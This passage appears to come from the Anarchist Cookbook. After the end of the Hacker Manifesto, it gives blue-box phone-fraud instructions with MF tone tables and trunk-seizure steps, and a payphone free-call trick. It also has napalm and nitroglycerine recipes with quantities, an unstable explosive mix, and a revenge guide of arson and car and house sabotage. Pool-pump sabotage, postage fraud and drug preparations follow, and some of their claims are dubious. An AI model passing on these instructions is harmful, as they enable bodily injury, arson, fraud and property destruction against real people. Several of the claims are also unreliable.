threatened by me.. Or thinks I'm a smart ass.. Or doesn't like
teaching and shouldn't be here... Damn
kid. All he does is play games.
They're all alike. And then it happened... a door opened to a world...
rushing through the phone line like heroin through an addict's veins, an
electronic pulse is sent out,
a refuge from the day-to-day incompetencies is
sought... a board is found.
"This is it... this is where I belong..." I know
everyone here... even if I've never met them, never
talked to them, may
never hear from them again... I know you all... Damn kid. Tying up the phone
line
again. They're all alike... You bet your ass we're all alike... we've
been spoon-fed baby food at
school when we hungered for steak... the bits of
meat that you did let slip through were pre-chewed
and tasteless. We've been
dominated by sadists, or ignored by the apathetic. The few that had
something to teach found us willing pupils, but those few are like drops of
water in the desert.
This is our world now... the world of the electron and
the switch, the beauty of the baud. We make use
of a service already
existing without paying for what could be dirt-cheap if it wasn't run by
profiteering gluttons, and you call us criminals. We explore... and you call
us criminals. We seek
after knowledge... and you call us criminals. We exist
without skin color, without nationality,
without religious bias... and you
call us criminals. You build atomic bombs, you wage wars, you
murder, cheat,
and lie to us and try to make us believe it's for our own good, yet we're the
criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime
is that of judging people by what they
say and think, not what they look
like. My crime is that of outsmarting you, something that you will
never
forgive me for. I am a hacker, and this is my manifesto. You may stop this
individual,but you
can't stop us all... after all, we're all alike.
+++The Mentor+++
[May the members of the phreak community never forget
his words -JR]
-----------Exodus-----------
Index
The Myth of the 2600hz Detector courtesy of the Jolly Roger
(Imported from the Apple ][ so forgive the upper case!!)
JUST
ABOUT EVERYONE I TALK TO THESE DAYS ABOUT ESS SEEMS TO BE SCARED WITLESS ABOUT
THE 2600HZ
DETECTOR. I DON'T KNOW WHO THOUGHT THIS ONE UP, BUT IT SIMPLY
DOES NOT EXIST. SO MANY OF YOU PEOPLE
WHINE ABOUT THIS SO -CALLED PHREAK
CATCHING DEVICE FOR NO REASON.
SOMEONE WITH AT&T SAID THEY HAD IT TO
CATCH PHREAKERS. THIS WAS JUST TO SCARE THE BLUE-BOXERS ENOUGH
TO MAKE THEM
QUIT BOXING FREE CALLS.
I'M NOT SAYING ESS IS WITHOUT ITS HANG-UPS, EITHER.
ONE THING THAT ESS CAN DETECT READILY IS THE
KICK-BACK THAT THE TRUNK
CIRCUITRY SENDS BACK TO THE ESS MACHINE WHEN YOUR LITTLE 2600HZ TONE RESETS
THE TOLL TRUNK. AFTER AN ESS DETECTS A KICKBACK IT TURNS AN M-F DETECTOR ON
AND RECORDES ANY M-F TONES
X-MITTED.
DEFEATING THE KICK-BACK
DETECTOR
AS MENTIONED IN MY PREVIOUS NOTE, KICK-BACK DETECTION CAN BE A
SERIOUS NUISANCE TO ANYONE INTERESTED
IN GAINING CONTROL OF A TRUNK LINE.
THE EASIEST WAY TO BY-PASS THIS DETECTION CIRCUITRY IS NOT REALLY
BY-PASSING
IT AT ALL, IT IS JUST LETTING THE KICK-BACK GET DETECTED ON SOME OTHER LINE.
THIS OTHER
LINE IS YOUR LOCAL MCI, SPRINT, OR OTHER LONG DISTANCE CARRIER
(EXCEPT AT&T). THE ONLY CATCH IS THAT
THE SERVICE YOU USE MUST NOT
DISCONNECT THE LINE WHEN YOU HIT THE 2600HZ TONE.
THIS IS HOW YOU DO IT:
CALL UP YOUR LOCAL EXTENDER, PUT IN THE CODE, AND DIAL A NUMBER IN THE 601 AREA
CODE AND THE 644 EXCHANGE. LOTS OF OTHER EXCHANGES WORK ACROSS THE COUNTRY,
I'M SURE, BUT THIS IS THE
ONLY ONE THAT I HAVE FOUND SO FAR. ANYWAY, WHEN IT
STARTS RINGING, SIMPLY HIT 2600HZ AND YOU'LL HEAR
THE KICK-BACK, (KA-CHIRP,
OR WHATEVER). THEN YOU ARE READY TO DIAL WHOEVER YOU WANT (CONFERENCES,
INWARD, ROUTE AND RATE, OVERSEAS, ETC.) FROM THE TRUNK LINE IN OPERATOR
TONES! SINCE BLOWING 2600HZ
DOESN'T MAKE YOU YOU A PHREAKER UNTIL THE TOLL
EQUIPMENT RESETS THE LINE, KICKBACK DETECTION IS THE
METHOD AT&T CHOOSES
(FOR NOW)
THIS INFORMATION COMES AS A RESULT OF MY EXPERIMENTS &
EXPERIENCE AND HAS BEEN VERIFIED BY LOCAL AT&T
EMPLOYEES I HAVE AS
ACQUAINTANCES. THEY COULD ONLY SAY THAT THIS IS TRUE FOR MY AREA, BUT WERE
PRETTY
SURE THAT THE SAME IDEA IS IMPLEMENTED ACROSS THE COUNTRY.
NOW THAT YOU KNOW HOW TO ACCESS A TRUNK LINE OR AS OPERATORS SAY A LOOP,
I WILL TELL YOU THE MANY
THINGS YOU CAN DO WITH IT. HERE IS A LIST OF
AT&T SERVICES ACCESSIBLE TO YOU BY USING A BLUE BOX.
A/C+101 TOLL
SWITCHING
A/C+121 INWARD OPERATOR
A/C+131 INFORMATION
A/C+141 ROUTE
& RATE OP.
A/C+11501 MOBILE OPERATOR
A/C+11521 MOBILE OPERATOR
STARTING CONFERANCES:
THIS IS ONE THE MOST USEFUL ATTRIBUTES OF
BLUE BOXING. NOW THE CONFS. ARE UP 24 HOURS/DAY AND 7
DAYS/WEEK AND THE
BILLING LINES ARE BEING BILLED.
SINCE I BELEIVE THE ABOVE IS TRUE (ABOUT THE
BILLING LINES BEING BILLED) I WOULD RECOMMEND THAT YOU
NEVER LET YOUR # SHOW
UP ON THE CONF. IF YOU STARTED IT, PUT IT ON A LOOP AND THEN CALL THE LOOP.
ENOUGH BULLSHIT!!!!! TO START THE CONF. DIAL ONE OF THESE THREE NUMBERS IN
M-F WHILE YOU ARE ON THE
TRUNK.
213+080+XXXX
XXXX=1050,3050
SPECIAL XXXX=1000,1100,1200,1500,2200,2500.
THESE #S ARE IN L.A. AND ARE
THE MOST WATCHED, I DO NOT ADVISE USING THIS
NPA.
312+001+1050 OR 3050
914+042+1050 OR 1100,1200 ECT..
***************************************
UPDATE, I BELEIVE ONLY 914 WORKS AT THE MOMENT
***************************************
ONCE CONNECTED WITH ONE OF
THESE YOU WILL EITHER HEAR A RE-ORDER, BUSY, OR CHERP. WHEN YOU HEAR THE
CHERP ENTER THE BILLING LINE IN M-F. I USE THE CONF. DIAL- UP.
A BILLING
LINE EXAMPLE: KP312+001+1050ST
YOU WILL THEN HEAR TWO TUTES AND A RECORDING
ASKING YOU FOR THE # OF CONFERREES INCLUDING YOURSELF.
ENTER A # BETWEEN 20
AND 30. IF YOU EVER GET OVER 30 PEOPLE ON A CONFERANCE ALL YOU WILL HEAR IS
JUMBLED VOICES. AFTER THE IT SAYS "YOUR CONFERANCE SIZE IS XX" THEN HIT #
SIGN. ADD YOUR FAVORITE LOOP
ON AND HIT 6 TO TRANSFER CONTROL TO IT. AFTER
IT SAYS CONTROL WILL BE TRANSFERED HANG UP AND CALL THE
OTHER SIDE OF THE
LOOP, HIT # SIGN AND FOLLOW THE INSTRUCTIONS. A BONUS FOR CONF. IS TO ADD AN
INTERNATIONAL # DIAL 1+011+CC+NUMBER PRETTY COOL EHHH.
A FEW EXTRA
NOTES.
DO NOT ADD #S THAT YOU WILL WANT TO HANG UP, ADD THESE THROUGH
MCI OR SPRINT. YOU CANNOT BLOW ANYONE
OFF W/2600HZ UNLESS THEY ARE IN AN OLD
X-BAR OR OLDER SYSTEM.
MANY D.A. OPERATORS WILL STAY ON AFTER YOU ABUSE
THEM; YOU MAY HAVE TO START ANOTHER OR AT LEAST DON'T
SAY ANY NUMBERS.
NEVER ADD THE TONE SIDE OF A LOOP ONTO A CONF.
NEVER ADD MORE THAN ONE
MCI NODE ON YOUR CONF.
ROUTE & RATE:
NOTE ROUTE & RATE
AND RQS PERFORM THE SAME SERVICE. R&R SIMPLY TELLS YOU ROUTE AND RATE INFO
WHICH IS
VERY VALUBLE, EX. SUCH AS THE INWARD ROUTING FOR AN EXCHANGE IN AN
AREA CODE. AN INWARD ROUTING WILL
LET YOU CALL HER AND SHE CAN DO AN
EMERGENCY INTERUPT FOR YOU. SHE CAN TELL YOU HOW TO GET
INTERNATIONAL
OPERATORS,ECT. HERE ARE THE TERMS YOU ARE REQUIRED TO USE: INTERNATIONAL,
-OPERATOR ROUTE FOR [COUNTRY, CITY]. *GIVES YOU INWARD OP.
-DIRECTORY ROUTE FOR [COUNTRY, CITY]. *GIVES YOU DIRECTORY ASS.
-CITY
ROUTE FOR [COUNTRY, CITY]. *GIVES YOU COUNTRY AND CITY CODE.
OPERATOR ROUTE
FOR [A/C]+ [EXCHANGE] *GIVES YOU INWARD OP. ROUTE
EX. [A/C]+ OR [A/C]+0XX+
WHEN SHE SAYS PLUS SHE MEANS PLUS 121.
NUMBERS ROUTE FOR [STATE, CITY]
*GIVES YOU A/C.
PLACE NAME [A/C]+[EXCHANGE] *GIVES YOU CITY/STATE FOR THAT
A/C AND EXCHANGE.
INTERNATIONAL CALLS:
TO CALL INTERNATIONAL
OVER CABLE SIMPLY ACCESS A TRUNK AND DIAL KP011XXXST WAIT FOR SENDER TONE,
KPXXXCC-NUMBERST XXX - A 3 DIGIT COUNTRY CODE, IT MAY NOT BE 3 DIGITS SO
JUST PUT 1 OR 2 0'S IN FRONT
OF IT. CC - IS THE CITY CODE TO GO BY
SATELLITE:
DIAL KP18XST X - NUMBERS 2-8 WAIT FOR SENDER TONE THEN
KPXXXCCNUMBERST
A favorite in the CookBookIV!
Exodus-.
Index
Blue Box courtesy of the Jolly Roger
To quote Karl Marx, blue boxing has always been the most noble form of
phreaking. As opposed to such
things as using an MCI code to make a free
fone call, which is merely mindless pseudo-phreaking, blue
boxing is actual
interaction with the Bell System toll network.
It is likewise advisable to
be more cautious when blue boxing, but the careful phreak will not be
caught, regardless of what type of switching system he is under.
In this
part, I will explain how and why blue boxing works, as well as where. In later
parts, I will
give more practical information for blue boxing and routing
information. To begin with, blue boxing is
simply communicating with trunks.
Trunks must not be confused with subscriber lines (or "customer
loops")
which are standard telefone lines. Trunks are those lines that connect central
offices. Now,
when trunks are not in use (i.e., idle or "on-hook" state)
they have 2600Hz applied to them. If they
are two-way trunks, there is
2600Hz in both directions.
When a trunk IS in use (busy or "off-hook"
state), the 2600Hz is removed from the side that is
off-hook. The 2600Hz is
therefore known as a supervisory signal, because it indicates the status of a
trunk; on hook (tone) or off-hook (no tone). Note also that 2600Hz denoted
SF (single frequency)
signalling and is "in-band." This is very important.
"In-band" means that is within the band of
frequencies that may be
transmitted over normal telefone lines. Other SF signals, such as 3700Hz are
used also. However, they cannot be carried over the telefone network
normally (they are "out-of-band"
and are therefore not able to be taken
advantage of as 2600Hz is. Back to trunks. Let's take a
hypothetical phone
call. You pick up your fone and dial 1+806-258-1234 (your good friend in
Amarillo,
Texas).
For ease, we'll assume that you are on #5 Crossbar
switching and not in the 806 area. Your central
office (CO) would recognize
that 806 is a foreign NPA, so it would route the call to the toll centre
that serves you. [For the sake of accuracy here, and for the more
experienced readers, note that the
CO in question is a class 5 with LAMA
that uses out-of-band SF supervisory signalling]. Depending on
where you are
in the country, the call would leave your toll centre (on more trunks) to
another toll
centre, or office of higher "rank". Then it would be routed to
central office 806-258 eventually and
the call would be completed.
Illustration
A---CO1-------TC1------TC2----CO2----B
A.... you
CO1=your central office
TC1.. your toll office.
TC2.. toll office in
Amarillo.
CO2.. 806-258 central office.
B.... your friend (806-258-1234)
In this situation it would be realistic to say that CO2 uses SF in-band
(2600Hz) signalling, while all
the others use out-of-band signal- ling
(3700Hz). If you don't understand this, don't worry. I am
pointing this out
merely for the sake of accuracy. The point is that while you are connected to
806-258-1234, all those trunks from YOUR central office (CO1) to the 806-258
central office (CO2) do
*NOT* have 2600Hz on them, indicating to the Bell
equipment that a call is in progress and the trunks
are in use.
Now
let's say you're tired of talking to your friend in Amarillo, so you send a
2600Hz down the line.
This tone travels down the line to your friend's
central office (CO2) where it is detected. However,
that CO thinks that the
2600Hz is originating from Bell equipment, indicating to it that you've hung
up, and thus the trunks are once again idle (with 2600Hz present on them).
But actually, you have not
hung up, you have fooled the equipment atyour
friend's CO into thinking you have. Thus,it disconnects
him and resets the
equipment to prepare for the next call. All this happens very quickly (300-800ms
for step-by-step equipment and 150-400ms for other equipment). When you stop
sending 2600Hz (after
about a second), the equipment thinks that another
call is coming towards
--> on hook, no tone -->off hook.
Now that
you've stopped sending 2600Hz, several things happen:
1. A trunk is seized.
2. A "wink" is sent to the CALLING end from the CALLED end indicating that
the CALLED end (trunk) is
not ready to receive digits yet.
3. A register
is found and attached to the CALLED end of the trunk within about two seconds
(max).
4. A start-dial signal is sent to the CALLING end from the CALLED end
indicating that the CALLED end
is ready to receive digits.
Now, all
of this is pretty much transparent to the blue boxer. All he really hears when
these four
things happen is a . So, seizure of a trunk would go something
like this:
1. Send a 2600Hz
2. Terminate 2600Hz after 1-2 secs.
3.
[beep][kerchunk]
Once this happens, you are connected to a tandem that
is ready to obey your every command. The next
step is to send signalling
information in order to place your call. For this you must simulate the
signalling used by operators and automatic toll-dialing equipment for use on
trunks. There are mainly
two systems, DP and MF. However, DP went out with
the dinosaurs, so I'll only discuss MF signalling.
MF (multi-frequency)
signalling is the signalling used by the majority of the inter- and intra-lata
network. It is also used in international dialing known as the CCITT no.5
system.
MF signals consist of 7 frequecies, beginning with 700Hz and
separated by 200Hz. A different set of
two of the 7 frequencies represent
the digits 0 thru 9, plus an additional 5 special keys. The
frequencies and
uses are as follows:
Frequencies (Hz) Domestic Int'l
-------------------------------------
700+900 1 1
700+1100 2 2
900+1100 3 3
700+1300 4 4
900+1300 5 5
1100+1300 6 6
700+1500 7 7
900+1500 8 8
1100+1500 9 9
1300+1500 0 0
700+1700 ST3p Code 1
900+1700 STp Code 1
1100+1700 KP KP1
1300+1700 ST2p KP2
1500+1700 ST ST
The timing of all the MF
signals is a nominal 60ms, except for KP, which should have a duration of
100ms. There should also be a 60ms silent period between digits. This is
very flexible however, and
most Bell equipment will accept outrageous
timings. In addition to the standard uses listed above, MF
pulsing also has
expanded usages known as "expanded inband signalling" that include such things
as
coin collect, coin return, ringback, operator attached, and operator
attached, and operator released.
KP2, code 11, and code 12 and the ST_ps
(STart "primes" all have special uses which will be mentioned
only briefly
here.
To complete a call using a blue box once seizure of a trunk has been
accomplished by sending 2600Hz
and pausing for the , one must first send a
KP. This readies the register for the digits that follow.
For a standard
domestic call, the KP would be followed by either 7 digits (if the call were in
the
same NPA as the seized trunk) or 10 digits (if the call were not in the
same NPA as the seized trunk).
[Exactly like dialing normal fone call].
Following either the KP and 7 or 10 digits, a STart is sent
to signify that
no more digits follow. Example of a complete call:
1. Dial 1-806-258-1234
2. wait for a call-progress indication (such as ring,busy,recording,etc.)
3. Send 2600Hz for about 1 second.
4. Wait for about ll-progress
indication (such as ring,busy,recording,etc.)
5. Send KP+305+994+9966+ST
The call will then connect if everything was done properly. Note that if
a call to an 806 number were
being placed in the same situation, the are
code would be omitted and only KP + seven digits + ST
would be sent.
Code 11 and code 12 are used in international calling to request certain
types of operators. KP2 is
used in international calling to route a call
other than by way of the normal route, whether for
economic or equipment
reasons. STp, ST2p, and ST3p (prime, two prime, and three prime) are used in
TSPS signalling to indicate calling type of call (such as coin-direct
dialing.
It all started here................... Exodus
Index
Napalm (Another way to make it...) by the Jolly Roger
(See file #021 of Cookbook IV for an easy way to make it!!)
About the best fire bomb is napalm. It has a thick consistancy, like jam
and is best for use on
vehilces or buildings. Napalms is simply one part
gasoline and one part soap. The soap is either soap
flakes or shredded bar
soap. Detergents won't do.
The gasoline must be heated in order for the soap
to melt. The usual way is with a double boiler where
the top part has at
least a two-quart capicity. The water in the bottom part is brought to a boil
and
the double boiler is taken from the stove and carried to where there is
no flame.
Then one part, by volume, of gasoline is put in the top part and
allowed to heat as much as it will
and the soap is added and the mess is
stirred until it thickens. A better way to heat gasoline is to
fill a
bathtub with water as hot as you can get it. It will hold its heat longer and
permit a much
larger container than will the double boiler.
------------Exodus-----------
Index
NITROGLYCERINE
Nitroglycerine is one of the most sensitive explosives, if it is not the
most sensitive. Although it
is possible to make it safely, it is difficult.
Many a young anarchist has been killed or seriously
injured while trying to
make the stuff. When Nobel's factories make it, many people were killed by the
all-to-frequent factory explosions. Usually, as soon as it is made, it is
converted into a safer
substance, such as dynamite. An idiot who attempts to
make nitroglycerine would use the following
procedure:
MATERIAL
EQUIPMENT
distilled water eye-dropper
table salt 100 ml beaker
sodium bicarbonate 200-300 ml beakers (2)
concentrated nitric
ice bath container
acid (13 ml) ( a plastic bucket serves well )
concentrated sulfuric centigrade thermometer
acid (39 ml)
glycerine blue litmus paper
1. Place 150 ml of distilled water into
one of the 200-300 ml beakers.
2. In the other 200-300 ml beaker, place 150
ml of distilled water and about a spoonful of sodium
bicarbonate, and stir
them until the sodium bicarbonate dissolves. Do not put so much sodium
bicarbonate in the water so that some remains undissolved.
3. Create an
ice bath by half filling the ice bath container with ice, and adding table salt.
This
will cause the ice to melt, lowering the overall temperature.
4.
Place the 100 ml beaker into the ice bath, and pour the 13 ml of concentrated
nitric acid into the
100 ml beaker. Be sure that the beaker will not spill
into the ice bath, and that the ice bath
will not overflow into the beaker
when more materials are added to it. Be sure to have a large
enough ice bath
container to add more ice. Bring the temperature of the acid down to about 20
degrees centigrade or less.
5. When the nitric acid is as cold as stated
above, slowly and carefully add the 39 ml of
concentrated sulfuric acid to
the nitric acid. Mix the two acids together, and cool the mixed
acids to 10
degrees centigrade. It is a good idea to start another ice bath to do this.
6. With the eyedropper, slowly put the glycerine into the mixed acids, one
drop at a time. Hold the
thermometer along the top of the mixture where the
mixed acids and glycerine meet.
DO NOT ALLOW THE TEMPERATURE TO GET ABOVE 30
DEGREES CENTIGRADE; IF THE TEMPERATURE RISES ABOVE
THIS TEMPERATURE, WATCH
OUT !!
The glycerine will start to nitrate immediately, and the temperature
will immediately begin to
rise. Add glycerine until there is a thin layer of
glycerine on top of the mixed acids. It is
always safest to make any
explosive in small quantities.
7. Stir the mixed acids and glycerine for the
first ten minutes of nitration, adding ice and salt to
the ice bath to keep
the temperature of the solution in the 100 ml beaker well below 30 degrees
centigrade. Usually, the nitroglycerine will form on the top of the mixed
acid solution, and the
concentrated sulfuric acid will absorb the water
produced by the reaction.
8. When the reaction is over, and when the
nitroglycerine is well below 30 degrees centigrade, slowly
and carefully
pour the solution of nitroglycerine and mixed acid into the distilled water in
the
beaker in step 1. The nitroglycerine should settle to the bottom of the
beaker, and the water-acid
solution on top can be poured off and disposed
of. Drain as much of the acid- water solution as
possible without disturbing
the nitroglycerine.
9. Carefully remove the nitroglycerine with a clean
eye-dropper, and place it into the beaker in step
2. The sodium bicarbonate
solution will eliminate much of the acid, which will make the
nitroglycerine
more stable, and less likely to explode for no reason, which it can do. Test the
nitroglycerine with the litmus paper until the litmus stays blue. Repeat
this step if necessary,
and use new sodium bicarbonate solutions as in step
2.
10. When the nitroglycerine is as acid-free as possible, store it in a
clean container in a safe
place. The best place to store nitroglycerine is
far away from anything living, or from anything
of any value. Nitroglycerine
can explode for no apparent reason, even if it is stored in a secure
cool
place.
-= Exodus =-
Index
Operation: Fuckup by the Jolly Roger
This is a guide for Anarchists and can be funny for non-believers and 12
and 13 year old runts, and
can be a lexicon of deadly knowledge for True
Anarchists... Serious damage is intended to be dealt
here. Do not try this
stuff unless you want to do a lot of serious Anarchy.
[Simulation]
Asshole - 'Listen, you little teenager punk shit, shut the fuck up, or
I'll knock you down!'
Anarchist - 'O.K.....You can't say I didn't warn you.
You don't know my rue power...' (soooo casually)
Asshole - 'Well, er, what
do you mean? Anarchist - '[demoniac grin]' As you can see, the Anarchist
knows something that this asshole doesn't...
[Operation Fuckup]
Geta wheel barrel or two. Fill with gasoline. Get 16 rolls of toilet
paper, unroll & drench in the
gasoline. Rip to shreds in gasoline. Get
asbestos gloves. Light a flare (to be punk), grab glob of
saturated toilet
paper (you can ignite the glob or not). Throw either flaming or dripping glob
into:
any window (picture is the best)
front doors
rough grain
siding
and best of all, brick walls.
First of all, this bitch is near
impossible to get off once dried, and is a terror to people inside
when lit!
After this... during the night, get a pickup truck, a few wheel-barrels, and a
dozen friends
with shovels. The pickup can be used only for transporting
people and equipment, or doing that, and
carting all the dirt. When it gets
around 12:00 (after the loser goes beddie - bye), dig a gargantuan
hole in
his front yard until about 3:00. You can either assign three or four of your
friends to cart
the dirt ten miles away in the pickup-bed, or bury his front
door in 15' of dirt!
After that is done, get three or four buckets of tar,
and coat his windows. You can make an added
twist by igniting the tar when
you are all done and ready to run! That is if the loser has a house. If
he
lives inside an apartment building, you must direct the attack more toward his
car, and front door.
I usually start out when he goes to work...I find out
what his cheap car looks like, and memorize it
for future abuse...It is
always fun to paint his front door (apt.) hot pink with purple polka-dots,
and off-neon colors in diagonal stripes. You can also pound a few hundred or
so four inch nails into
his front door (this looks like somebody really
doesn't like you from the inside). Another great is to
fill his keyhole with
liquid steel so that after the bastard closes his door - the only way to get
back in is to break it down. If you can spare it, leave him an axe - that
is, implanted three inches
into, and through the door!
Now, this next
one is difficult, but one of the best! Get a piece of wood siding that will more
than
cover his front door completely. Nail two by fours on the edges of the
siding (all except the bottom)
so you have a barge - like contraption. Make
a hole at the top that will be large enough for a cement
slide. Mix about
six or seven LARGE bags of QUICK drying cement. Use the cement slide to fill the
antichamber created by the 'barge' that is around his door. Use more two by
fours to brace your little
cement-filled barge, and let the little gem dry.
When it is, remove the 'barge' so only a stone monolith remains that covers
his door. Use any
remaining cement to make a base around this so he can't
just push it over. When I did this, he called
the fire department, and they
thought he meant wood, so they brought axes. I watched with a few dozen
or
so other tenants, and laughed my damn ass off! This is only his door! After he
parks his car for
the night, the fun really begins...I start out by opening
up the car by jamming a very thin, but loack
- inside and out!
Then
proceed to put orange-juice syrup all over the seats, so after he gets through
all the other shit
that you do, he will have the stickiest seats in the
world. You can then get a few Sunday papers, and
crack one of the windows
about four inches. Lightly crumple the papers, and continue to completely
fill the inside of his car with the newspapers. A copy of the Sunday New
York Times will nicely fill a
Volkeswagon! What is also quite amusing is to
put his car on cinder blocks, slash his tires at the
top, and fill them with
cement! Leave the cinder blocks there so that, after he knocks the car off of
them, he will get about 3 miles to the gallon with those tires, and do 0 to
60 in about two minutes!
It is even more hilarious when he doesn't know why
the hell why! Another is to open his hood, and then
run a few wires from the
sparkplugs to the METAL body. The sure is one HOT car when it is running!
Now, I like to pour two pounds of sugar down his gas tank. If this doesn't
blow every gasket in his
engine it will do something called 'carmelizing his
engine'. This is when the extreme heat turns the
sugar to carmel, and you
literally must completely take the engine out and apart, and clean each and
every individual part!
Well, if this asshole does not get the message,
you had better start to get serious. If this guide was
used properly &
as it was intended (no, not as kindling for the fire), this asshole will either
move
far away, seek professional psychological help, commit suicide, or all
of the above!
-----------Exodus----------
Index
How to "steal" local calls from most Payphones by the Jolly
Roger
Now to make free local calls, you need a finishing nail. I highly
recommend "6D E.G. FINISH C/H, 2
INCH" nails. These are about 3/32 of an
inch in diameter and 2 inches long (of course). You also need
a large size
paper clip. By large I mean they are about 2 inches long (FOLDED). Then you
unfold the
paper clip. Unfold it by taking each piece and moving it out 90
degrees. When it is done it should
look somewhat like this:
/----------\
: :
: :
: :
: :
\-----
Now, on to the neat stuff.
What you do, instead of unscrewing the glued-on mouthpiece, is insert the
nail into the center hole of the mouthpiece (where you talk) and push it in
with pressure or just
hammer it in by hitting the nail on something. Just
DON'T KILL THE MOUTHPIECE! You could damage it if
you insert the nail too
far or at some weird angle. If this happens then the other party won't be able
to hear what you say.
You now have a hole in the mouthpiece in which you
can easily insert the paper clip. So, take out the
nail and put in the paper
clip.
Then take the other end of the paper clip and shove it under the
rubber cord protector at the bottom
of the handset (you know, the blue
guy...). This should end up looking remotely like...like this:
/----------\
Mouthpiece
: :
Paper clip --> : : /
: /---:---\
: : :
:------------>
====================\---))):
: To earpiece ->
^ ^
\-------------------->
: :
: :
Cord Blue guy
(The paper clip is shoved under the blue guy to make a good connection
between the inside of the
mouthpiece and the metal cord.) Now, dial the
number of a local number you wish to call, sayyyy, MCI.
If everything goes
okay, it should ring and not answer with the "The Call You Have Made Requires a
20
Cent Deposit" recording. After the other end answers the phone, remove
the paper clip. It's all that
simple, see?
There are a couple problems,
however. One is, as I mentioned earlier, the mouthpiece not working after
you punch it. If this happens to you, simply move on to the next payphone.
The one you are now on is
lost. Another problem is that the touch tones
won't work when the paper clip is in the mouthpiece.
There are two ways
around this..
* Dial the first 6 numbers. This should be done without the
paper clip making the connection, i.e.,
one side should not be connected.
Then connect the paper clip, hold down the last digit, and
slowly pull the
paper clip out at the mouthpiece's end.
* Don't use the paper clip at all.
Keep the nail in after you punch it. Dial the first 6 digits.
Before dialing
the last digit, touch the nail head to the plate on the main body of the phone,
the
money safe thingy..then press the last number. The reason that this
method is sometimes called
clear boxing is because there is another type of
phone which lets you actually make the call and
listen to them say "Hello,
hello?" but it cuts off the mouthpiece so they can't hear you. The
Clear Box
is used on that to amplify your voice signals and send it through the earpiece.
If you
see how this is even slightly similar to the method I have just
described up there, kindly explain
it to ME!! Cause I don't GET IT! Anyways,
this DOES work on almost all single slot, Dial Tone
First payphones (Pacific
Bell for sure). I do it all the time. This is the least, I STRESS
*LEAST*,
risky form of Phreaking.
I was unable to update this one. From what I
recall, it stil worked. Look for payfones w/o the little
volume button in
the upper left of the casing. They should be old enough to use..
-Exodus-
Index
Pool Fun by the Jolly Roger
First of all, you need know nothing about pools. The only thing you need
know is what a pool filter
looks like. If you don't know that. Second, dress
casual. Preferably, in black. Visit your "friends"
house, the one whose pool
looks like fun!!) Then you reverse the polarity of his/her pool, by
switching the wires around. They are located in the back of the pump. This
will have quite an effect
when the pump goes on. In other words.
Boooooooooooommm! Thats right, when you mix + wires with -
plugs, and vice-
versa, the 4th of july happens again.
Not into total destruction??? When the
pump is off, switch the pump to "backwash". Turn the pump on
and get the
phuck out! When you look the next day, phunny. The pool is dry. If you want
permanant
damage, yet no great display like my first one mentioned, shut the
valves of the pool off. (There are
usually 2) One that goes to the main
drain and one that goes to the filter in the pool. That should be
enough to
have one dead pump. The pump must take in water, so when there isn't any...
Practical jokes: these next ones deal with true friends and there is *no*
permanent damage done. If
you have a pool, you must check the pool with
chemicals. There is one labeled orthotolidine. The other
is labeled alkaline
(ph). You want orthotolidine. (It checks the chlorine).
Go to your local
pool store and tell them you're going into the pool business, and to sell you
orthotolidine (a CL detector) Buy this in great quantities if possible. The
solution is clear. You
fill 2 baggies with this chemical. And sew the bags
to the inside of your suit. Next, go swimming with
your friend!
Then
open the bags and look like you're enjoying a piss. And anyone there will turn a
deep red! They
will be embarrased so much, Especially if they have guests
there! Explain what it is, then add vinegar
to the pool. Only a little. The
"piss" disappears.
HAHA!! --------------Exodus------------
Index
Free Postage by the Jolly Roger
The increasing cost of postage to mail letters and packages is bringing
down our standard of living.
To remedy this deplorable situation, some
counter control measures can be applied.
For example, if the stamps on a
letter are coated with Elmer's Glue by the sender, the cancellation
mark
will not destroy the stamp: the Elmer/s drives to form an almost invisible
coating that protects
the stamps from the cancellation ink. Later, the
receiver of the letter can remove the cancellation
mark with water and reuse
the stamps. Furthermore, ecological saving will also result from recycling
the stamps. Help save a tree.
The glue is most efficently applied
with a brush with stiff, short bristles. Just dip the brush
directly into
the glue and spread it on evenly, covering the entire surface of the stamp. It
will dry
in about 15 minutes.
For mailing packages, just follow the
same procedure as outlined above; however, the package should be
weighed and
checked to make sure that it has the correct amount of postage on it before it
is taken to
the Post Office.
Removing the cancellation and the glue
from the stamps can be easily accomplished by soaking the
stamps in warm
water until they float free from the paper. The stamps can then be put onto a
paper
towel to dry. Processing stamps in large batches saves time too. Also,
it may be helpful to write the
word 'Elmer' at the top of the letter (not on
the envelope) to cue the receiving party in that the
stamps have been
protected with the glue.
We all know that mailing packages can be
expensive. And we also know that the handicapped are
sometimes discriminated
against in jobs. The Government, being the generous people they are, have
given the blind free postal service.
Simply address you envelope as
usual, and make one modification. In the corner where the stamp would
go,
write in (or stamp) the words 'FREE MATTER FOR THE BLIND". Then drop you package
or letter in one
of the blue fedral mailboxes. DO NOT TAKE THE LETTER TO THE
POST OFFICE, OR LEAVE IT IN YOUR MAILBOX.
Sounds very nice of the
government to do this, right? Well, they aren't that nice. The parcel is sent
library rate, that is below third class. It may take four to five days to
send a letter to just the
next town.
This too is quite simple, but
less effective. Put the address that you are sending the letter to as
the
return address. If you were sending a $20 donation to the pirate's Chest, you
would put our
address (po box 644, lincoln ma. 01773) as the return address.
Then you would have to be carless and
forget to put the stamp on the
envelope. A nice touch is to put a bullshit address in the center of
the
envelope.
Again, you MUST drop the letter in a FEDRAL mailbox. If the
post office doesn't send the letter to the
return address for having no
stamp, they will send it back for the reason of "No such address".
Example--
Pirates Chest Dept. 40DD
P.O. Box 644865
Lincol, Ma. 41773
Tom Bullshit
20 Fake Road
What Ever, XX 99851
One last
thing you might try doing is soaking a cancelled stamp off of an envelope, and
gluing it onto
one you are sending. Then burn the stamp, leaveing a little
bit to show that there was one there.
--Exodus
Index
Unstable Explosives by the Jolly Roger
Mix solid Nitric Iodine with househould ammonia. Wait overnight and then
pour off the liquid. You will
be left with a muddy substance. Let this dry
till it hardens. Now throw it at something!!!!
------------Exodus-----------
Index
Weird Drugs by the Jolly Roger
Bananas:
1. Obtain 15 pounds of ripe yellow bananas
2. Peel all
and eat the fruit. Save the peelings
3. Scrape all the insides of the peels
with a sharp knife.
4. Put all the scraped material in a large pot and add
water.
5. Boil 3 or 4 hours until it has attained a solid paste considtency.
6. Spread paste onto cookie sheets and dry in ofen for about 20 minutes.
This will result in fine
black powder. Usually one will feel the effects
after smoking three to four cigarettes.
Cough syrup:
mix
robitussion a-c with an equal amount of ginger ale and drink. The effect are
sedation and
euphoria. Never underestimate the effects of any drug! You can
od on cough syrup!
Toads:
1. Collect five to ten toads, frogs will
not work. The best kind are tree toads.
2. Kill them as painlessly as
possible, and skin immediately.
